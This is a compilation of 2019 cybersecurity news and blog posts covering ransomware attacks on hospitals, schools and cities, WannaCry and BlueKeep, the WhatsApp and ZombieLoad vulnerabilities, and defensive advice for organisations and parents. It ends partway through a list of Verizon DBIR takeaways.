WanaCry Ransomware still a threat two years on – HackingVision Widely infamous WanaCry Ransomware is still a threat two years on. WanaCry Ransomware and the EternalBlue exploit are still causing problems two years on.     In May of 2017 Cryptoworm Ransomeware WanaCry started to target systems worldwide, the Ransomeware was targeting computers and devices ... Read moreWanaCry Ransomware still a threat two years on – HackingVision

The post WanaCry Ransomware still a threat two years on – HackingVision appeared first on HackingVision.

Campbell County Memorial Hospital in Wyoming hit by ransomware attack

Campbell County Memorial Hospital in Gilette, Wyoming is facing service disruptions after a ransomware attack hit its computer systems on Friday.

On Friday, the Campbell County Memorial Hospital in Gilette, Wyoming, suffered a ransomware attack that is still causing service disruptions.

“Campbell County Health has been the victim of a ransomware attack. All CCH computer systems have been affected, which impacts the organization’s ability to provide patient care,” reads a statement published by the Campbell County Health.

All updates are available at: www.cchwyo.org/sd. Public Update 9/22/19, 2:30 pm: Campbell County Health continues to…

Gepostet von Campbell County Health am Freitag, 20. September 2019

The ransomware attack is having a dramatic impact con the operations at the hospital, the staff has canceled some surgeries, as well as respiratory therapy and radiology exams and procedures. The hospital has temporarily halted new inpatient admissions.

“Campbell County Health continues to have service disruptions, however, the Emergency Medical Services (EMS), the Emergency Department, Maternal Child (OB) and the Walk-in Clinic are open to assess patients and treat or transfer patients as appropriate.” reads an update published by the hospital. “It is advised to call to confirm your appointment prior to going in. All patients are also asked to bring medication bottles with them to their appointment.”

Immediately after the discovery of the attack, the hospital announced that that the patients presenting to the emergency department and walk-in clinic would be assessed and transferred to an appropriate care facility if needed.

“We are working with regional facilities to transfer patients to if we are not able to provide safe care. The Emergency Department is open and staffed with our expert team of physicians and nursing to assess and evaluate patient care needs,” announced the Campbell County Health.

According to the management at the Campbell County Health hospital, patient and employee data was not accessed in the ransomware attack.

The organization reported the incident to the authorities that still investigating the security breach.

“At this point in time, there is no evidence that any patient data has been accessed or misused. The investigation is ongoing, and we will provide updates when more information becomes available. We are working diligently to restore complete access to our services,” Campbell County Health added.

As on Sunday, the majority of the services at the hospital was restored, however, patients are invited to call in advance to confirm their appointments.

Recently several US cities have suffered ransomware attacks, in August at least 23 Texas local governments were targeted by coordinated attacks.

Some cities in Florida were also victims of hackers, including Key Biscayne, Riviera Beach and Lake City. In June, the Riviera Beach City agreed to pay $600,000 in ransom to decrypt its data after a ransomware-based attack hit its computer system. A few days later, Lake City also agreed to pay nearly $500,000 in ransom after a ransomware attack.

In July 2018, another Palm Beach suburb, Palm Springs, decided to pay a ransom, but it was not able to completely recover all its data.

In March 2019, computers of Jackson County, Georgia, were infected with ransomware that paralyzed the government activity until officials decided to pay a $400,000 ransom to decrypt the files.

The list of ransomware attacks is long and includes schools in Louisiana and Alabama.

Health organizations weren’t spared either, LabCorp and Hancock Health being only two of the most recently affected.

Pierluigi Paganini

(SecurityAffairs – Campbell County Memorial Hospital, hacking)

The post Campbell County Memorial Hospital in Wyoming hit by ransomware attack appeared first on Security Affairs.

Key threats and trends SMB IT teams deal with

MSPs are significantly more concerned with internal data breaches and rapidly evolving technology practices, whereas internal IT teams are more concerned with employee behavior/habits, according to a Central by LogMeIn report. The global survey, which polled 500 IT professionals across North America and Europe, also showed that top security concerns remain consistent year over year with 54 percent of IT professionals ranking malware as their number one security concern, followed by ransomware (46 percent) and … More

The post Key threats and trends SMB IT teams deal with appeared first on Help Net Security.

Eight great habits that enterprises can practice for bolstering cybersecurity

Estimated reading time: 3 minutes

Efficient cybersecurity is built on the foundation of good habits practised by internal customers. Enterprises may think a great deal about implementing effective cybersecurity practices and have plenty of meetings, but it’s actually not that complicated.

An effective framework is the first step but more importantly, is ensuring effective habit-formulation.

Unfortunately, enterprises are populated by humans who like to take the easier but riskier way out. Whether it’s setting the same password across all accounts, leaving data freely available or using company devices on risky Wi-Fi networks, bad habits can be problematic.

Here are a few tendencies that should be eliminated as soon as possible.

  1. Weak passwords

The problem with weak passwords is an issue that plagues an entire organization, from the top to the bottom. It’s not enough to have a policy about strong passwords – it’s also important to run regular campaigns across the entire organization with real-life case studies to educate employees on the importance of using strong passwords and how to do so.

  1. A lack of a security policy

The lack of a single unified security policy is an extremely bad enterprise security habit. A proper policy keeps all information and strategies in one place, becoming a one-stop repository in case of crises. Without a security policy, it is difficult for enterprises to remain protected.

  1. Taking shortcuts

When enterprises underestimate the damage cyberattacks, the propensity is to run towards shortcuts. This means being reactionary to attacks and not taking cybersecurity seriously by running the most basic of solutions and not investing too much time and energy. This is a recipe for disaster – cybersecurity is an extremely important function of an enterprise today and needs to be taken as seriously as any other function.

  1. Forgetting to have cybersecurity drills

Just like fire safety drills, it’s important to have regular cybersecurity drills. This inculcates preparedness into employees and gives them an idea of what happens during a cyberattack. But many organizations go for months and years without having one. This makes them extremely unprepared in the event of an actual cyber attack.

  1. Delayed patching and updating

Vulnerabilities in different enterprise software are often found every day and patches & updates are released to keep businesses safe from a cyber strike. But organizations can often be guilty of not being up-to-date on patching software for vulnerabilities. Hackers and cybercriminals are aware of this and often use these vulnerabilities to enter systems and cause immense chaos.

  1. Not investing in backup

An enterprise security framework goes a long way in enabling protection and strong solutions can also play a part. But it’s always important to have a fallback plan and that is where backup comes in. By backing up critical data at regular intervals, enterprises can ensure they have something to fall back on, in case of critical situations. However, many enterprises neglect this important step and as a result, put themselves at great risk in the event of unforeseen circumstances.

  1. Underestimating social engineering

Many enterprises can slip into the notion that cybersecurity is purely a technological problem and putting in place, a strong cybersecurity solution can solve all problems. But that is not the case – social engineering is as big an issue as cybersecurity, nowadays. The only way to solve this is to ensure that employees are as well- versed in cybersecurity issues.

  1. The problem with access control

Access control is an issue almost every organization struggles with. They may have the strongest firewalls but it can be sometimes of no use if every user in the organization has access to everything. That makes the company very susceptible to insider breaches. This also means that, if a hacker manages to gain control of a system with access to the network he can break the entire IT infrastructure.

Seqrite’s Unified Threat Management (UTM) provides a one-stop solution for many of the problems identified above. It acts as the first line of defence providing IT security management, a safe working environment, high productivity, regulatory compliance in a cost-effective way.

The post Eight great habits that enterprises can practice for bolstering cybersecurity appeared first on Seqrite Blog.

Over 12,000 WannaCry Variants Detected in the Wild

Security researchers have determined that over 12,000 variants of the WannaCry ransomware family are preying upon users in the wild. Sophos attributed this rise of variants to threat actors taking the original 2017 WannaCry binary and modifying it to suit their needs. These versions have subsequently produced numerous infection attempts. In August 2019, for instance, […]… Read More

The post Over 12,000 WannaCry Variants Detected in the Wild appeared first on The State of Security.

TFlower Ransomware Targeting Businesses via Exposed RDS

A new crypto-ransomware threat called “TFlower” is targeting corporate environments via exposed Remote Desktop Services (RDS). First discovered in August, the ransomware makes its way onto a corporate network after attackers hack into a machine’s exposed Remote Desktop Services. This attack vector enables bad actors to infect the local machine with TFlower. At that point, […]… Read More

The post TFlower Ransomware Targeting Businesses via Exposed RDS appeared first on The State of Security.

District in Rockford Public Schools Confirms Ransomware Attack

A district within the Rockford Public Schools (RPS) system has confirmed it suffered a ransomware attack that affected parts of its network. On 6 September, District 205 of RPS posted a statement on Facebook in which it noted that its Internet, phones and information systems used to track attendance and student records were down. The […]… Read More

The post District in Rockford Public Schools Confirms Ransomware Attack appeared first on The State of Security.

10 of the Most Significant Ransomware Attacks of All Time

For years, ransomware actors have developed new families and attack campaigns in increasing frequency and numbers. Such activity peaked in 2017 but then fell in tandem with cryptocurrency miners’ rise. This development was short-lived, however. Between Q4 2018 and Q1 2019, Malwarebytes observed a 195 percent increase in ransomware detections involving business targets. The rate […]… Read More

The post 10 of the Most Significant Ransomware Attacks of All Time appeared first on The State of Security.

Fake PayPal Website Distributes New Variant of Nemty Ransomware

Digital attackers created a fake PayPal website to distribute samples of a new variant of the Nemty crypto-ransomware family. Security researcher nao_sec uncovered the ransomware variant after they came across a fake PayPal website. This site promised users a return of 3-5 percent for making purchases through its payment system. But its primary purpose was […]… Read More

The post Fake PayPal Website Distributes New Variant of Nemty Ransomware appeared first on The State of Security.

Ransomware Attackers Demanded $5.3M from City of New Bedford

Digital criminals demanded $5.3 million in ransom from the City of New Bedford, Massachusetts following a ransomware attack. Jon Mitchell, Mayor of New Bedford, explained in a press briefing that the ransom demand came shortly after the City’s Management Information Systems (MIS) staff detected a ransomware attack in the early morning hours of 5 July […]… Read More

The post Ransomware Attackers Demanded $5.3M from City of New Bedford appeared first on The State of Security.

Ransomware Protection and Containment Strategies: Practical Guidance for Endpoint Protection, Hardening, and Containment

Ransomware is a global threat targeting organizations in all industries. The impact of a successful ransomware event can be material to an organization - including the loss of access to data, systems, and operational outages. The potential downtime, coupled with unforeseen expenses for restoration, recovery, and implementation of new security processes and controls can be overwhelming. Ransomware has become an increasingly popular choice for attackers over the past few years, and it’s easy to understand why given how simple it is to leverage in campaigns – while offering a healthy financial return for attackers.

In our latest report, Ransomware Protection and Containment Strategies: Practical Guidance for Endpoint Protection, Hardening, and Containment, we discuss steps organizations can proactively take to harden their environment to prevent the downstream impact of a ransomware event. These recommendations can also help organizations with prioritizing the most important steps required to contain and minimize the impact of a ransomware event after it occurs.

Ransomware is commonly deployed across an environment in two ways:

  1. Manual propagation by a threat actor after they’ve penetrated an environment and have administrator-level privileges broadly across the environment:
    • Manually run encryptors on targeted systems.
    • Deploy encryptors across the environment using Windows batch files (mount C$ shares, copy the encryptor, and execute it with the Microsoft PsExec tool).
    • Deploy encryptors with Microsoft Group Policy Objects (GPOs).
    • Deploy encryptors with existing software deployment tools utilized by the victim organization.
  2. Automated propagation:
    • Credential or Windows token extraction from disk or memory.
    • Trust relationships between systems – and leveraging methods such as Windows Management Instrumentation (WMI), SMB, or PsExec to bind to systems and execute payloads.
    • Unpatched exploitation methods (e.g., EternalBlue – addressed via Microsoft Security Bulletin MS17-010).

The report covers several technical recommendations to help organizations mitigate the risk of and contain ransomware events including:

  • Endpoint segmentation
  • Hardening against common exploitation methods
  • Reducing the exposure of privileged and service accounts
  • Cleartext password protections

If you are reading this report to aid your organization’s response to an existing ransomware event, it is important to understand how the ransomware was deployed through the environment and design your ransomware response appropriately. This guide should help organizations in that process.

Read the report today.

*Note: The recommendations in this report will help organizations mitigate the risk of and contain ransomware events. However, this report does not cover all aspects of a ransomware incident response. We do not discuss investigative techniques to identify and remove backdoors (ransomware operators often have multiple backdoors into victim environments), communicating and negotiating with threat actors, or recovering data once a decryptor is provided.

Cyber Security Roundup for August 2019

Twitter boss, Jack Doresy, had his Twitter account was hacked at the end of August, with hackers using his account to send a stream of offensive messages to his 4.2 million followers. It appears Jack was using his mobile phone to provide multi-factor authentication access to his Twitter account, a good solid security practice to adopt, however, it appears his Twitter account password and his mobile phone SMS service were both compromised, the latter probably due to either sim card swap fraud social engineering by the hacker, or by an insider at his mobile network service provider.

A database holding over a million fingerprints and personal data was exposed on the net by Suprema, a biometric security company. Researchers at VPNMentor didn't disclose how they were able to find and access the 'Biostar 2' database, nor how long the data was accessible online. Biostar 2 is used by 5,700 organisations, including governments, banks and the UK Metropolitan Police. In a similar fashion, an independent researcher found a 40Gb Honda Motor Company database exposed online.

TfL took their Oyster system offline to 'protect customers' after a credential stuffing attack led to the compromise of 1,200 Oyster customer accounts. A TfL spokesman said 'We will contact those customers who we have identified as being affected and we encourage all customers not to use the same password for multiple sites.' I was also directly made aware that restaurant chain TGI Friday was also hit were a credential stuffing attack(s) after it urgently warned its UK customers on the importance of using strong unique passwords for its reward scheme.

It was another bumper 'Patch Tuesday', with Microsoft releasing security updates for 93 security vulnerabilities, including 31 which are 'critical' rated in Windows, Server 2019, IE, Office, SharePoint and Chakra Core. 

Amongst the Microsoft patch release were patches for two serious 'bluekeep' or 'WannaCry' wormable vulnerabilities in Windows Remote Desktop Services, CVE-2019-1181 and CVE-2019-1182.  A Microsoft Security Response Center (MSRC) blog post said Microsoft had found the vulnerabilities as part of a project to make Remote Desktop Services more secure, and stated 'future malware that exploits these could propagate from vulnerable computer to vulnerable computer without user interaction.” The fixes for these are available for download in the Microsoft Security Update Guide.

A United Nations report concluded North Korea funded its weapons programme to the tune of $2 billion from profits from cyber attacks. 'Democratic People’s Republic of Korea cyber actors, many operating under the direction of the Reconnaissance General Bureau, raise money for its WMD (weapons of mass destruction) programmes, with total proceeds to date estimated at up to two billion US dollars,' the UN report said. The report referred at least 35 instances of North Korean-sponsored cryptomining activity or attacks on financial companies and cryptocurrency exchanges. The attacks spanned a total of 17 countries and were designed to generate funds the would be hard to trace and elude regulatory oversight.

NEWS

VULNERABILITIES AND SECURITY UPDATES
HUAWEI NEWS AND THREAT INTELLIGENCE
AWARENESS, EDUCATION AND THREAT INTELLIGENCE

7 Questions to Ask Your Child’s School About Cybersecurity Protocols

Just a few weeks into the new school year and, already, reports of malicious cyberattacks in schools have hit the headlines. While you’ve made digital security strides in your home, what concerns if any should you have about your child’s data being compromised at school?

There’s a long and short answer to that question. The short answer is don’t lose sleep (it’s out of your control) but get clarity and peace of mind by asking your school officials the right questions. 

The long answer is that cybercriminals have schools in their digital crosshairs. According to a recent report in The Hill, school districts are becoming top targets of malicious attacks, and government entities are scrambling to fight back. These attacks are costing school districts (taxpayers) serious dollars and costing kids (and parents) their privacy.


Prime Targets

According to one report, a U.S. school district becomes the victim of cyberattack as often as every three days. The reason for this is that cybercriminals want clean data to exploit for dozens of nefarious purposes. The best place to harvest pure data is schools where social security numbers are usually unblemished and go unchecked for years. At the same time, student data can be collected and sold on the dark web. Data at risk include vaccination records, birthdates, addresses, phone numbers, and contacts used for identity theft. 

Top three cyberthreats

The top three threats against schools are data breaches, phishing scams, and ransomware. Data breaches can happen through phishing scams and malware attacks that could include malicious email links or fake accounts posing as acquaintances. In a ransomware attack, a hacker locks down a school’s digital network and holds data for a ransom. 

Over the past month, hackers have hit K-12 schools in New Jersey, New York, Wisconsin, Virginia, Oklahoma, Connecticut, and Louisiana. Universities are also targeted.

In the schools impacted, criminals were able to find loopholes in their security protocols. A loophole can be an unprotected device, a printer, or a malicious email link opened by a new employee. It can even be a calculated scam like the Virginia school duped into paying a fraudulent vendor $600,000 for a football field. The cybercrime scenarios are endless. 

7 key questions to ask

  1. Does the school have a data security and privacy policy in place as well as cyberattack response plan?
  2. Does the school have a system to educate staff, parents, and students about potential risks and safety protocols? 
  3. Does the school have a data protection officer on staff responsible for implementing security and privacy policies?
  4. Does the school have reputable third-party vendors to ensure the proper technology is in place to secure staff and student data?
  5. Are data security and student privacy a fundamental part of onboarding new school employees?
  6. Does the school create backups of valuable information and store them separately from the central server to protect against ransomware attacks?
  7. Does the school have any new technology initiatives planned? If so, how will it address student data protection?

The majority of schools are far from negligent. Leaders know the risks, and many have put recognized cybersecurity frameworks in place. Also, schools have the pressing challenge of 1) providing a technology-driven education to students while at the same time, 2) protecting student/staff privacy and 3) finding funds to address the escalating risk.

Families can add a layer of protection to a child’s data while at school by making sure devices are protected in a Bring Your Own Device (BYOD) setting. Cybersecurity is a shared responsibility. While schools work hard to implement safeguards, be sure you are taking responsibility in your digital life and equipping your kids to do the same. 

 

The post 7 Questions to Ask Your Child’s School About Cybersecurity Protocols appeared first on McAfee Blogs.

Cyber News Rundown: Hookup App Exposes Users

Reading Time: ~ 2 min.

Hookup App Leaks User Locations

Geo-locating and other sensitive data has been leaked from the hookup app 3fun, exposing the information for more than 1.5 million users. While some dating apps using trilateration to find nearby users, 3fun showed location data capable of tracing a user to a specific building or floor. Though users had the option to disable coordinate tracking, that data was nevertheless stored and available through the app’s API. 3fun has since resolved the leak and has hopefully implemented stronger security measures considering the private nature of their client’s activities.

Ransomware Attacks on DSLR Cameras

Malware authors continue to find new victims, as a ransomware variant has been found to be remotely attacking Canon DSLR cameras and demanding a ransom to regain access to the device. Researchers have found multiple vulnerabilities that could allow attackers to perform any number of critical functions on the cameras, including displaying a ransom note and remotely taking pictures with the camera. Fortunately, Canon has already begun issuing patches for some of its affected devices, though it’s taking longer to fully secure others.

Take back your privacy. Learn more about the benefits of a VPN.

Google Drive Exploit Allows Phishing Campaign to Flourish

A new phishing campaign has been discovered that uses a legitimate Google Drive account to launch a phishing campaign that impersonates the CEO asking the victim to open the Google Docs file and navigate to the phishing site’s landing page. Luckily for victims, the campaign has a few tells. The phony CEO email address uses a non-conforming naming convention and the email itself appears to be a hastily compiled template.

British Airways Data Leak

British Airways has again come under scrutiny, this time after it was discovered that their e-ticketing system was leaking sensitive passenger data. The leak stems from flight check-in links that were sent out to customers containing both their surname and booking confirmation numbers completely unencrypted within the URL. Even more worrisome, this type of vulnerability has been well-known since last February when several other airlines were found to have the same issue by the same security firm.

Android Trojan Adds New Functionality

Following in the footsteps of Anubis, an Android banking Trojan for which source code was recently revealed, Cerberus has quickly filled the void without actually borrowing much of that code. One major change is that Cerberus implemented a new method of checking if the device is physically moving or not, in hopes of avoiding detection by both the victim and any researchers who may be analyzing it. Additionally, this variant uses phishing overlays from several popular sites to further collect any login credentials or payment card data.

The post Cyber News Rundown: Hookup App Exposes Users appeared first on Webroot Blog.

Cyber Security Roundup for July 2019

July was a month of mega data privacy fines. The UK Information Commissioners Office (ICO) announced it intended to fine British Airways £183 million for last September's data breach, where half a million BA customer personal records were compromised. The ICO also announced a £100 million fine for US-based Marriot Hotels after the Hotel chain said 339 million guest personal data records had been compromised by hackers. Those fines were dwarfed on the other side of the pond, with Facebook agreeing to pay a US Federal Trade Commission (FTC) fine of $5 billion dollars, to put the Cambridge Analytica privacy scandal to bed. And Equifax paid $700 million to FTC to settle their 2017 data breach, which involved the loss of at least 147 million personal records. Big numbers indeed, we are seeing the big stick of the GDPR kicking in within the UK, and the FTC flexing some serious privacy rights protection punishment muscles in the US. All 'food for thought' when performing cybersecurity risk assessments.

Through a Freedom of Information request, the UK Financial Conduct Authority (FCA) disclosure a sharp rise of over 1000% in cyber-incidents within UK financial sector in 2018. In my view, this rise was fueled by the mandatory data breach reporting requirement of the GDPR, given it came into force in May 2018. I also think the finance sector was reluctant to report security weakness pre-GDPR, over fears of damaging their customer trust. Would you trust and use a bank if you knew its customers were regularly hit by fraud?

Eurofins Scientific, the UK's largest forensic services provider, which was taken down by a mass ransomware attack last month, paid the cybercrooks ransom according to the BBC News. It wasn't disclosed how much Eurofins paid, but it is highly concerning when large ransoms are paid, as it fuels further ransomware attacks.

A man was arrested on suspicion of carrying out a cyberattack against Lancaster University. The UK National Crime Agency said university had been compromised and "a very small number" of student records, phone numbers and ID documents were accessed. In contrast, the FBI arrested a 33 old software engineer from Seattle, she is alleged to have taken advantage of a misconfigured web application firewall to steal a massive 106 million personal records from Capital One. A stark reminder of the danger of misconfiguring and mismanaging IT security components.

The Huawei international political rhetoric and bun fighting has gone into retreat. UK MPs said there were no technological grounds for a complete Huawei banwhile Huawei said they were 'confident' the UK will choose to include it within 5G infrastructure. Even the White House said it would start to relax the United States Huawei ban. It seems something behind the scenes has changed, this reversal in direction is more likely to be financially motivated than security motivated in my rather cynical view.

A typical busy month for security patch releases, Microsoft, Adobe and Cisco all releasing the expected barrage of security updates for their products. There was security updates released by Apple as well, however, Google researchers announced six iPhone vulnerabilities, including one that remains unpatched.

BLOG
NEWS
VULNERABILITIES AND SECURITY UPDATES
HUAWEI NEWS AND THREAT INTELLIGENCE

MegaCortex Returns…

MegaCortex, a ransomware which was first spotted in January this year, has become active again and has changed the way it previously attacked/targeted the corporate world. In order to simplify its execution and increase its scale of operation, it uses ‘Command Prompt’ instead of ‘PowerShell’ in current targeted campaign. Key…

School of Cyberthreats: 3 Attacks Impacting Today’s Schools

Educational institutions are data-rich gold mines. From student and employee records to sensitive financial information, schools contain a plethora of data that can be obtained by cybercriminals rather easily due to lack of security protocols. This fact has cybercriminals pivoting their strategies, leading to a recent uptick in attacks on the education sector in the United States and around the world. In fact, there are three main threats impacting schools — data breaches, phishing, and ransomware. Let’s take a look at each of these threats, how cybercriminals have executed them, and the precautions students can take in the future.

Data Breaches

Nearly half of the cyberattacks that impacted schools in 2018 were data breaches, which occur when an unauthorized, third-party gains access to a school’s network. From there, cybercriminals gain access to a host of private information on employees and students, including names, dates of birth, addresses, phone numbers, email addresses, and Social Security numbers. After an attack of this nature occurs, educational institutions reassess their current cybersecurity strategy. This usually entails revisiting privacy settings and reviewing all security protocols. 

Phishing

Even the savviest email user can fall for a phishing scheme. These types of schemes usually entail tricking teachers or students out of private information or money. When cybercriminals send emails with fraudulent links, unsuspecting users click on that link because the web address is usually only off by one or two letters. Once the scammer has been given access through the malicious link, they get to work obtaining private information contained on the device. Using this data, they can enact further schemes. There have even been cases of cybercriminals impersonating deans or teachers asking for gift cards, which is a type of spear-phishing where scammers take the information they have obtained about a victim and use it to their advantage. The good news? Users can prevent against these sneaky attacks by staying vigilant and applying security best practices.

Ransomware

When ransomware hits, schools don’t really have a lot of options. If they have data backups in place, then they don’t have to pay the ransom, otherwise educational institutions have no choice but to completely shut down. Considering how much technology has been integrated into classrooms, this isn’t surprising. A ransomware attack usually occurs when a school district’s system is infiltrated by a virus intending to bring operations to a halt. Cybercriminals hold systems hostage for a certain amount of money or ransom until the district decides to pay. The data that is held can range from a variety of things – lesson plans, financial information, personal employee and student records. There aren’t many ways for schools to bypass these types of attacks unless they are prepared beforehand. One way to be prepared is to back up files in multiple places, such as an external hard drive or cloud.

With the uptick in overall cyberthreats against schools, more and more educational institutions need to put protocols into place to avoid the multitude of ever-growing threats. However, students can do their part in prioritizing cybersecurity by following these tips to ensure personal data is secure:

  1. Watch what you are clicking. Phishing schemes are becoming craftier. A too good to be true study guide or deal on a textbook might end in a compromised system. It is always best to check directly with the source of the email or link before handing over money or data.
  2. Make sure you recognize the sender. When responding to a message, first check to see if you recognize the sender’s name and email address. If it looks strange, ignore the message. If you are unsure, check with the sender in person.
  3. Never reuse passwords. Many users reuse the same passwords or slight variations of it, across all of their accounts. That means if a hacker uncovers one password, all other accounts are put at risk. So, it is crucial to use different passcodes to ensure hackers cannot obtain access to all of your accounts.
  4. Stay on a secure network. If you connect to public Wi-Fi, be sure the network is secure. If it is not, consider using a virtual private network (VPN).
  5. Install security software on all devices. Security doesn’t begin or end with personal computers. All devices need to be protected with comprehensive security software, including mobile devices and tablets.
  6. Make sure all device software is up-to-date. This is one of the easiest and best ways to secure devices against threats, as developers are constantly releasing patches for vulnerabilities and flaws.

And as always, if you are interested in learning more about IoT and mobile security trends and information, follow @McAfee_Home on Twitter, and ‘Like” us on Facebook.

The post School of Cyberthreats: 3 Attacks Impacting Today’s Schools appeared first on McAfee Blogs.

Cyber Security Roundup for June 2019

Keep Patching!
June 2019 was another very busy month for security update releases. Microsoft released updates to patch 22 critical rated vulnerabilities, Intel released 11 fixes, and there were also several critical security updates for Apple Airport, Adobe Flash Player, Cisco devices, Cisco Data Centre Network ManagerDell SupportAssistGoogle Chrome, Firefox and Apache.  One further standout vulnerability was the "SACK Panic" TCP Linux and FreeBSD kernel vulnerability, uncovered by Netflix researchers, however, Microsoft released a security advisory in regards to TCP SACK Panic by the end of the month.

The National Security Agency (NSA) backed up UK National Cyber Security Centre (NCSC) and Microsoft’s continuing strong recommendations for everyone to apply the latest security updates to all versions of Microsoft Windows, including the unsupported XP, Vista and Windows 2003 Server, to protect against the supercritical CVE-2019-0708 “BlueKeep” vulnerability.

More Major Ransomware Attacks coming to the UK?
We all know the United States government famously takes a stand of no negotiation with terrorists and kidnappers, with the specific policy of never paying ransom demands. There is a good reason for this policy, as paying ransoms just serves to encourage further kidnapping and ransom demands. So it was interesting to learn this month, that US local government does not adhere to the same policy when dealing with ransomware demands. Rivera Beach (Florida) paid a whopping $600,000 ransom to hackers after its computers systems were taken over by ransomware after an employee clicked on a link within a phishing email. Phishing emails are the typical starting ingress of most mass ransomware outbreaks which cripple organisations.  The Lake City (Florida) government officials said they had also paid a $460,000 ransom to cybercrooks following a ransomware attack on their municipality on 10th June.  Meanwhile, Baltimore officials approved $10 million to cover ongoing expenses related to its ransomware attack.

Paying ransomware demands will fuel further ransomware attacks, so I expect ransomware attacks to further escalate. So the big question is, can we expect UK further local government authorities and large organisations to be hard hit by mass ransomware outbreaks? The answer to that will come down to how well their patch management is, and whether lessons have been truly learnt from the destructive 2017 WannaCry ransomware outbreaks, which took down a number of NHS services. Given the recent BlueKeep Microsoft Windows critical vulnerability is expected to spark new strains of ransomware in the coming months, ransomware very much like WannaCry with the devasting capability of rapidly infecting and propagating via unpatched Microsoft Windows systems connected to flat networks, we shall soon find out.

Data Breaches
No major UK data breaches were reported in June 2019, but on the other side of the pond, a misconfigured AWS S3 bucket managed by a data integration company led to confidential data from Netflix, TD Bank, Ford and other companies being exposed. And a misconfigured MongoDB database resulted in 5 million personal records left open to the public via a website. Data breaches caused by misconfigured cloud services operated by third parties is becoming a bit of regular theme.

APT10 Cloud Hopper Campaign further Exposed
An interesting article by Reuters revealed eight of the world’s biggest technology service providers were successfully hacked by APT10 aka 'StonePanda'. APT10, linked to China hackers, operated a sustained campaign over a number of years dubbed “Cloud Hopper”, which Reuters revealed affected Hewlett Packard Enterprise (HPE), IBM, Fujitsu, Tata Consultancy Services, NTT Data, Dimension Data, Computer Sciences Corporation, and DXC Technology. The ATP10 attackers searched for access points into networks an IT systems, when found, extracted confidential information and potential trade secrets. These reported hacks may well be the tip of the iceberg. The Register stated, having gained access to the major service providers, the APT10 group may have gained access to many of their customers. Those customers run into the millions, “dramatically increasing the pool of valuable industrial and aerospace data stolen.”

BLOG
NEWS

VULNERABILITIES AND SECURITY UPDATES

HUAWEI NEWS AND THREAT INTELLIGENCE
AWARENESS, EDUCATION AND THREAT INTELLIGENCE
REPORTS

WhatsApp, Microsoft and Intel Chip Vulnerabilities

Quickly applying software updates (patching) to mitigate security vulnerabilities is a cornerstone of both a home and business security strategy. So it was interesting to see how the mainstream news media reported the disclosure of three separate ‘major’ security vulnerabilities this week, within WhatsApp, Microsoft Windows and Intel Processors.

WhatsApp

The WhatsApp security flaw by far received the most the attention of the media and was very much the leading frontpage news story for a day. The WhatsApp vulnerability (CVE-2019-3568) impacts both iPhone and Android versions of the mobile messaging app, allowing an attacker to install surveillance software, namely, spyware called Pegasus, which access can the smartphone's call logs, text messages, and can covertly enable and record the camera and microphone.

From a technical perspective, the vulnerability (CVE-2019-3568) can be exploited with a buffer overflow attack against WhatsApp's VOIP stack, this makes remote code execution possible by sending specially crafted SRTCP packets to the phone, a sophisticated exploit.

Should you be concerned?

WhatsApp said it believed only a "select number of users were targeted through this vulnerability by an advanced cyber actor." According to the FT, that threat actor was an Israeli company called ‘NSO Group’. NSO developed the exploit to sell on, NSO advertises it sells products to government agencies "for fighting terrorism and aiding law enforcement investigations". NSO products (aka "spyware") is known to be used by government agencies in UAE, Saudi Arabia and Mexico.

So, if you are one of the 1.5 billion WhatsApp users, not a middle-east political activist or a Mexican criminal, you probably shouldn’t too worry about your smartphone being exploited in the past. If you were exploited, there would be signs, with unusual cliches and activity on your phone.  Despite the low risk at present, all WhatsApp users should quickly update their WhatsApp app before criminals attempt to ‘copycat’ NSO Group exploitation.

How to Prevent 

Update the WhatsApp app.
iOS

  • Open the Apple AppStore App
  • Search for WhatsApp Messenger
  • Tap 'Update' and the latest version of WhatsApp will be installed
  • App Version 2.19.51 and above fixes the vulnerability
Android
  • Open Google Play Store
  • Tap the menu in the top left corner
  • Go to “My Apps & Games”
  • Tap ‘Update’ next to WhatsApp Messenger and the latest version of WhatsApp will be installed
  • App Version 2.19.134 and above fixes the vulnerability
Microsoft Worm Vulnerability CVE-2019-0708
Making fewer media headlines was the announcement of a new “wormable” vulnerability discovered within the various versions of the Microsoft’s Windows operating system.  The vulnerability CVE-2019-0708 is within Window's “remote desktop services” component.

This vulnerability is by far the most dangerous vulnerability reported this week, probably this year, it is a similar flaw to what the WannaCry malware exploited on mass in May 2017. WannaCry was a ransomware worm which severely impacted the operation of several large organisations, including the NHS. It exploited a similar Microsoft Windows vulnerability which enabled the malware to quickly self-propagate (worm) across networks and infecting vulnerable systems on mass with ransomware, rendering such systems unusable.


Such is the concern of a second WannaCry style attack due to this flaw, Microsoft has taken the rare step of releasing security patches for their unsupported versions of the Windows operating system, such as Windows XP and Windows Server 2003. 

How to Prevent
Apply the latest Microsoft Windows Update. Microsoft has said anti-virus products will not provide any protection against the exploitation of this vulnerability, therefore applying the Microsoft May 2019 Security Update, as released on Tuesday 14th May 2019, is the only way to be certain of protecting against the exploitation of this critical vulnerability 

Ensure automatic updates is always kept switched on. Windows by default should attempt to download and install the latest security updates, typically you will be prompted to apply the update and accept a reboot, do this without delay. 

To double check, select the Start menu, followed by the gear cog icon on the left. Then, select Update & Security and Windows Update.

Businesses must also seek to apply Microsoft security updates as soon as they are released. Typically large organisations control the release of Microsoft security patches centrally, they should monitor and risk assess the importance of newly released security updates, and then apply across their IT estate at a rate based on risk.

Intel CPU ZombieLoad Vulnerability
There was little mainstream coverage about a third major security vulnerability reported this week. Coined 'ZombieLoad side-channel processor', this vulnerability is present in almost every Intel processor made since 2011. This hardware vulnerability is a concern to businesses which use or provide cloud services. This flaw can also be mitigated by patching, with Microsoft, Apple, Amazon and Google all releasing security patches. For further information about the Intel CPU vulnerability, read the following posts.

2019 Verizon Data Breach Investigations Report (DBIR) Key Takeaways

The 2019 Verizon Data Breach Investigations Report (DBIR) was released today, and I was lucky enough to be handed a hot off the press physical copy while at the Global Cyber Alliance Cyber Trends 2019 event at Mansion House, London. For me, the DBIR provides the most insightful view on the evolving threat landscape, and is the most valuable annual “state of the nation” report in the security industry.

Global Cyber Alliance Cyber Trends 2019

The DBIR has evolved since its initial release in 2008, when it was payment card data breach and Verizon breach investigations data focused. This year’s DBIR involved the analysis of 41,686 security incidents from 66 global data sources in addition to Verizon. The analysed findings are expertly presented over 77 pages, using simple charts supported by ‘plain English’ astute explanations, reason why then, the DBIR is one of the most quoted reports in presentations and within industry sales collateral.

DBIR 2019 Key Takeaways
      • Financial gain remains the most common motivate behind data breaches (71%)
      • 43% of breaches occurred at small businesses
